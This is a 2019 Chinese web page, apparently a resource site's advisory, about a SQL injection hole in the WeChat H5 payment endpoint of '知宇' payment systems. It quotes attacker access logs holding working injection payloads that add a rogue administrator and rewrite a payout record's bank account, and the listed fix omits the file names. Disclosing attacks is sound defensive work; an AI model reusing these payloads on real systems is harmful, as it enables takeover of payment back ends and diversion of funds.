黑客渗透拿后台bug详情

  • 时间:2019-07-05 03:16 编辑:admin 来源:云客网 阅读:196
  • 扫一扫,手机访问
摘要:黑客渗透拿后台bug详情近日多套知宇系统的内核被悄悄添加管理员,潜入后台进行了各种操作本站系统也有2名客户被入侵,经过排查,发现系统漏洞存在位置:修复漏洞方法:删除这几个文件即可本更新适用于任何知宇系统,后台被入侵的问题,如

黑客渗透拿后台bug详情

近日多套知宇系统的内核被悄悄添加管理员,潜入后台进行了各种操作
本站系统也有2名客户被入侵,经过排查,发现系统漏洞存在位置:
修复漏洞方法:
删除


这几个文件即可

本更新适用于任何知宇系统,后台被入侵的问题,如有其他问题也欢迎联系我们探讨!

先贴黑客访问日志:


119.123.70.255 - - [12/May/2019:23:42:58 +0800] "GET /Pay_Wxwap_topay?orderid[0]=exp&orderid[1]==333;insert%20into%20pay_admin%20(username,password,groupid,mobile)%20values%20(4444,%22cbb25dce076877e45ca702f574118793%22,1,%2214782532320%22);%23 HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
112.97.51.203 - - [13/May/2019:04:21:44 +0800] "GET /Pay_Wxwap_topay?orderid[0]=exp&orderid[1]==333;UPDATE%20pay_tklist%20SET%20banknumber%20=%20%276228482099650200777%27%20,bankname%20=%20%27%E4%B8%AD%E5%9B%BD%E5%86%9C%E4%B8%9A%E9%93%B6%E8%A1%8C%27%20,bankfullname%20=%20%27%E9%A5%B6%E8%99%8E%27%20where%20id%20=1284;%23 HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
112.97.51.203 - - [13/May/2019:04:22:11 +0800] "GET /Pay_Wxwap_topay?orderid[0]=exp&orderid[1]==333;UPDATE%20pay_tklist%20SET%20banknumber%20=%20%276228482099650200777%27%20,bankname%20=%20%27%E4%B8%AD%E5%9B%BD%E5%86%9C%E4%B8%9A%E9%93%B6%E8%A1%8C%27%20,bankzhiname%20=%20%27%27,bankfullname%20=%20%27%E9%A5%B6%E8%99%8E%27%20where%20id%20=1284;%23 HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"

原理就是 微信官方H5 通道有被SQL注入的BUG
请直接删除


  • 全部评论(0)
资讯详情页-文字区下方-通栏
最新发布的资讯信息
【源码教程|dz自用备忘录】网站ip域名被墙(被封锁、被屏蔽、被和谐)和dns污染的解决办法(2019-07-06 00:01)
【源码教程|奇客Api支付系统使用教程】淘宝红包(旺信群)免签通道配置说明(2019-07-05 03:29)
【源码教程|奇客Api支付系统使用教程】支付宝转银行卡免签通道配置说明(2019-07-05 03:27)
【源码教程|奇客Api支付系统使用教程】钉钉群收款免签通道配置说明(2019-07-05 03:27)
【源码教程|】新双跳转卡模式配置说明(2019-07-05 03:25)
【源码教程|奇客Api支付系统使用教程】微信转卡配置说明(2019-07-05 03:24)
【源码教程|奇客Api支付系统使用教程】地区风控设置(2019-07-05 03:23)
【源码教程|奇客Api支付系统使用教程】农信易扫通道配置说明(2019-07-05 03:22)
【源码教程|奇客Api支付系统使用教程】手动抢单说明(2019-07-05 03:22)
【源码教程|】民生一码通配置(2019-07-05 03:21)
网站首页  |   关于我们  |   广告合作  |   联系我们  |   隐私条款  |   免责声明
CopyRight 2016-2018 云客资源网 | 黑ICP备17009420号
中国站长资源交易平台:云客网 |阿落博客 | 无能者
  借力推 | 云客文化传播 | 帮帮网赚 | 哈尔滨永泰电梯 | 在线编码转换 | 站长工具 | 爱站网 | IP138 | 找源码 | ATOOL在线工具 | 网站之家 | 站长分类目录 | 卢松松博客 | 小白源码网